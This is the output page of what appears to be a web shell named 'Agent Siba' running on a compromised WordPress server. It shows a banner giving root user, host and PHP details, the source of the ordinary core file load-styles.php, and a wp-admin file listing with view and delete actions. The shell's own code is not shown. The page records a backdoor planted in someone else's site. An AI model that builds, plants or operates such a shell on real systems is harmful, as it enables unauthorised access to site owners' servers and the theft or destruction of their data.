Agent Siba

User: root Host: 18th-ph-latest OS: Linux PHP: 8.2.28 SAPI: apache2handler
// var/www/html/admin-staging..
<?php /** * Disable error reporting * * Set this to error_reporting( -1 ) for debugging */ error_reporting(0); /** Set ABSPATH for execution */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', dirname( dirname( __FILE__ ) ) . '/' ); } define( 'WPINC', 'wp-includes' ); require( ABSPATH . 'wp-admin/includes/noop.php' ); require( ABSPATH . WPINC . '/script-loader.php' ); require( ABSPATH . WPINC . '/version.php' ); $load = $_GET['load']; if ( is_array( $load ) ) { $load = implode( '', $load ); } $load = preg_replace( '/[^a-z0-9,_-]+/i', '', $load ); $load = array_unique( explode( ',', $load ) ); if ( empty($load) ) exit; $rtl = ( isset($_GET['dir']) && 'rtl' == $_GET['dir'] ); $expires_offset = 31536000; // 1 year $out = ''; $wp_styles = new WP_Styles(); wp_default_styles($wp_styles); if ( isset( $_SERVER['HTTP_IF_NONE_MATCH'] ) && stripslashes( $_SERVER['HTTP_IF_NONE_MATCH'] ) === $wp_version ) { $protocol = $_SERVER['SERVER_PROTOCOL']; if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0' ) ) ) { $protocol = 'HTTP/1.0'; } header( "$protocol 304 Not Modified" ); exit(); } foreach ( $load as $handle ) { if ( !array_key_exists($handle, $wp_styles->registered) ) continue; $style = $wp_styles->registered[$handle]; if ( empty( $style->src ) ) { continue; } $path = ABSPATH . $style->src; if ( $rtl && ! empty( $style->extra['rtl'] ) ) { // All default styles have fully independent RTL files. $path = str_replace( '.min.css', '-rtl.min.css', $path ); } $content = get_file( $path ) . "\n"; if ( strpos( $style->src, '/' . WPINC . '/css/' ) === 0 ) { $content = str_replace( '../images/', '../' . WPINC . '/images/', $content ); $content = str_replace( '../js/tinymce/', '../' . WPINC . '/js/tinymce/', $content ); $content = str_replace( '../fonts/', '../' . WPINC . '/fonts/', $content ); $out .= $content; } else { $out .= str_replace( '../images/', 'images/', $content ); } } header("Etag: $wp_version"); header('Content-Type: text/css; charset=UTF-8'); header('Expires: ' . gmdate( "D, d M Y H:i:s", time() + $expires_offset ) . ' GMT'); header("Cache-Control: public, max-age=$expires_offset"); echo $out; exit;
Name Size Perms Owner Modified Actions
../ - rwxr-xr-x 33:33 2026-07-26 17:16 Del
css/ - rwxr-xr-x 33:33 2019-10-12 07:58 Del
images/ - rwxr-xr-x 33:33 2019-10-12 07:58 Del
includes/ - rwxr-xr-x 33:33 2026-07-24 08:13 Del
maint/ - rwxr-xr-x 33:33 2026-07-24 08:13 Del
network/ - rwxr-xr-x 33:33 2019-10-12 08:00 Del
user/ - rwxr-xr-x 33:33 2026-07-24 08:25 Del
about.php 33.42 KB rw-r--r-- 33:33 2019-09-05 10:34 View Del
admin-ajax.php 4.24 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
admin-footer.php 2.55 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
admin-functions.php 405 B rw-r--r-- 33:33 2019-06-01 07:08 View Del
admin-post.php 1.65 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
async-upload.php 3.48 KB rw-r--r-- 33:33 2019-09-05 10:34 View Del
comment.php 10.21 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
credits.php 4.78 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
custom-background.php 19.43 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
custom-header.php 45.31 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
customize.php 9.26 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
edit-comments.php 13.64 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
edit-form-advanced.php 26.87 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
edit-form-blocks.php 12.82 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
edit-form-comment.php 7.19 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
edit-link-form.php 5.9 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
edit-tag-form.php 9.08 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
edit-tags.php 20.01 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
edit.php 16.31 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
error_log 1.76 MB rw-r--r-- 33:33 2019-09-26 12:41 View Del
export.php 10.46 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
freedoms.php 4.95 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
import.php 7.03 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
index.php 6.01 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
install-helper.php 5.62 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
install.php 15.78 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
link-add.php 700 B rw-r--r-- 33:33 2019-06-01 07:08 View Del
link-manager.php 3.83 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
link-parse-opml.php 2.34 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
link.php 2.56 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
load-scripts.php 1.57 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
load-styles.php 2.16 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
media-new.php 3.02 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
media-upload.php 3.26 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
media.php 5.14 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
menu-header.php 9.28 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
menu.php 13.35 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
moderation.php 320 B rw-r--r-- 33:33 2019-06-01 07:08 View Del
ms-admin.php 211 B rw-r--r-- 33:33 2019-06-01 07:08 View Del
ms-delete-site.php 3.9 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
ms-edit.php 231 B rw-r--r-- 33:33 2019-06-01 07:08 View Del
ms-options.php 236 B rw-r--r-- 33:33 2019-06-01 07:08 View Del
ms-sites.php 228 B rw-r--r-- 33:33 2019-06-01 07:08 View Del
ms-themes.php 230 B rw-r--r-- 33:33 2019-06-01 07:08 View Del
ms-upgrade-network.php 232 B rw-r--r-- 33:33 2019-06-01 07:08 View Del
ms-users.php 228 B rw-r--r-- 33:33 2019-06-01 07:08 View Del
my-sites.php 4.51 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
nav-menus.php 39.85 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
network.php 5.2 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
options-discussion.php 14.4 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
options-general.php 14.65 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
options-head.php 488 B rw-r--r-- 33:33 2019-06-01 07:08 View Del
options-media.php 5.92 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
options-permalink.php 17.78 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
options-reading.php 8.16 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
options-writing.php 8.1 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
options.php 11.42 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
plugin-editor.php 12.72 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
plugin-install.php 6.07 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
post-new.php 2.63 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
post.php 8.87 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
press-this.php 2.25 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
privacy.php 7.74 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
profile.php 296 B rw-r--r-- 33:33 2019-06-01 07:08 View Del
revision.php 4.92 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
setup-config.php 14.81 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
term.php 2.06 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
theme-editor.php 14.06 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
theme-install.php 14.57 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
themes.php 20.82 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
tools.php 2.52 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
update-core.php 30.49 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
update.php 10 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
upgrade-functions.php 340 B rw-r--r-- 33:33 2019-06-01 07:08 View Del
upgrade.php 4.41 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
upload.php 12.92 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
user-edit.php 26.94 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
user-new.php 21.18 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
users.php 17.9 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del
widgets.php 18.04 KB rw-r--r-- 33:33 2019-06-01 07:08 View Del